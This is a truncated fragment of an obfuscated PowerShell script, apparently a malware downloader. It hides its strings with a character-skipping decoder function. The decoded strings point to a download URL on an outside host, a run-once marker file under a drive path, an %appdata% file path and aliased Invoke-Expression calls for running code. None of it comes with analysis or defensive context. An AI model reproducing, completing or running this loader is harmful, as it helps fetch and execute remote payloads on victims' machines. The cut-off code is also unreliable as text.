P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyi |